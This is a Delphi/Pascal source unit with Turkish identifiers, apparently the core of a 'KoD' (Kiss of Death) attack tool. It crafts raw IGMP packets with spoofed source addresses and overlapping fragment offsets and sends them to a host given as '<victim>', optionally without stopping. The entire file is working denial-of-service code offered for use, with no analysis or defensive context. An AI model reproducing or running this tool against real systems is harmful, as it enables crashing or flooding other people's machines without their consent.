unit u_main;

interface

uses
  u_winsck2, u_sysutils, u_sockhdr;

type
  TKodOptions = packed record
    Delay: Cardinal;
    HedefAdres: TSockAddrIn;
    Num, Sended: integer;
    RandomSeek: Int64;
    Socket: TSocket;
  end;

var
  KodOpt: TKodOptions;

  function GetRandomValue(const Range: Integer): Integer;
  function Gonder(s: TSocket; var Buf; len, flags: Integer; var addrto: TSockAddr;
    tolen: Integer): Integer;
  function Resolve(const host: PChar): Cardinal;
  procedure CreateSocket;
  procedure Send_KoD;
  procedure Send_KoD_SetIGMPhdr;
  procedure Send_KoD_SetIPhdr;
  procedure SetDefaultOptions;
  procedure SetParams;
  procedure Usage(const Path: string);

implementation

function GetRandomValue(const Range: Integer): Integer; // function for getting different random
begin                                                   // values between very short times
  Random;
  Inc(KodOpt.RandomSeek);
  Result := (Random(High(Integer)) + KodOpt.RandomSeek*$FFFF) mod Range;
end;

function Gonder(s: TSocket; var Buf; len, flags: Integer; var addrto: TSockAddr;
  tolen: Integer): Integer; // function for sending packet and for checking send error
var
  LastError: Integer;
begin
  WSASetLastError(0);
  Result := Sendto(s, Buf, len, flags, addrto, tolen); // send packet
  LastError := WSAGetLastError;
  if LastError <> 0 then
    Writeln('Unable to send igmp packet. Error code: ' + InttoStr(LastError));
end;

function Resolve(const host: PChar): Cardinal; // function for resolving host to ip
var
  InAddr: TInAddr;
  HostEnt: PHostEnt;
begin
  InAddr.S_addr := inet_addr(host); // convert ip address format (ex: 127.0.0.1) to cardinal
  if InAddr.S_addr = INADDR_NONE then // if it is not a ip address then resolve it
  begin
    HostEnt := GetHostByName(host);
    if not Assigned(HostEnt) then // if couldn't resolve the host then exit
    begin
      Writeln('Error: Unable to resolve host: ' + host);
      Halt(0);
    end;
    Move((HostEnt^.h_addr_list^)^, InAddr.S_addr, HostEnt^.h_length); // move resolved host to InAddr.S_addr
  end;
  Result := InAddr.S_addr;
end;

procedure CreateSocket; // procedure for creating a raw socket
begin
  KodOpt.Socket := Socket(AF_INET, SOCK_RAW, IPPROTO_RAW); // create a socket
  if KodOpt.Socket = INVALID_SOCKET then // exit if couldn't create a socket
  begin
    Writeln('Error on creating socket');
    Halt(0);
  end;
  if SetSockOpt(KodOpt.Socket, IPPROTO_IP, IP_HDRINCL, '1', 4) <> 0 then
  begin // if can't set the IP_HDRINCL option then exit
    Writeln('Error: IP_HDRINCL'#13#10 +
            '(Note that this program only works on Windows XP)');
    Halt(0);
  end;
end;

const
  IP_MF = $2000;
  Len = 1500;

var
  Buf: array [0..Len - 1] of Char;
  IPhdr: PIPhdr = @Buf[0];
  IGMPhdr: PIGMPhdr = @Buf[20];

procedure Send_KoD;
  procedure FGonder(const size: integer);
  begin
    IPhdr.ip_sum := 0;
    IPhdr.ip_sum := CheckSum(@IPhdr^, 20);
    Gonder(KodOpt.Socket, Buf, size, 0, KodOpt.HedefAdres, Sizeof(KodOpt.HedefAdres));
  end;
begin
  FillChar(Buf, Sizeof(Buf), 0);
  FillChar(Buf[28], Len - 28, 'A');
  Send_KoD_SetIPhdr;
  Send_KoD_SetIGMPhdr;
{ Packet 1 }
  IPhdr.ip_len := htons(1500);
  IPhdr.ip_off := htons(IP_MF);
  FGonder(Len);
{ Packet 2 }
  IPhdr.ip_off := htons(185) or htons(IP_MF);
  FGonder(Len);
{ Packet 3 }
  IPhdr.ip_off := htons(720) or htons(IP_MF);
  FGonder(Len);
{ Packet 4 }  
  IPhdr.ip_len := htons(831);
  IPhdr.ip_off := htons(925);
  FGonder(831);
end;

procedure Send_KoD_SetIGMPhdr;
begin
  IGMPhdr.igmp_type := 2;
  IGMPhdr.igmp_code := 31;
  IGMPhdr.igmp_group := inet_addr('128.1.1.1');
end;

procedure Send_KoD_SetIPhdr;
begin
  IPhdr.ip_verlen := $45;
  IPhdr.ip_id := 69;
  IPhdr.ip_ttl := 255;
  IPhdr.ip_p := 2;
  IPhdr.ip_src := $7FFA2560;
  IPhdr.ip_dst := KodOpt.HedefAdres.sin_addr.S_addr;
end;

procedure SetDefaultOptions;
begin
  KodOpt.HedefAdres.sin_addr.S_addr := Resolve(PChar(ParamStr(1)));
  KodOpt.HedefAdres.sin_family := AF_INET;
  KodOpt.HedefAdres.sin_port := htons(GetRandomValue(High(Word)) + 1);
end;

procedure SetParams; // procedure for setting optional parameters
var
  i, pcount: Integer;
  pstr: string;
  Ch: Char;
begin
  pcount := ParamCount;
  for i := 2 to pcount do
  begin
    pstr := ParamStr(i);
    Ch := #0;
    if Length(pstr) = 2 then
    begin
      if pstr[1] = '-' then
        Ch := pstr[2];
    end;
    if Ch = #0 then Continue;
    case Ch of
      'n' : KodOpt.Num:=StrtoIntDef(ParamStr(i + 1), 0);
      'd' : KodOpt.Delay:=StrtoIntDef(ParamStr(i + 1), 0);
    end;
  end;
end;

procedure Usage(const Path: string);
begin
  Write(
        'usage: ' + Path + ' <victim> [options]'#13#10#13#10 +
        'Options:'#13#10 +
        '  -n:    Num of packets to send (0 is continuous (default))'#13#10 +
        '  -d:    Delay (in ms)          (default 0)'#13#10
       );
  Halt(0);
end;

end.
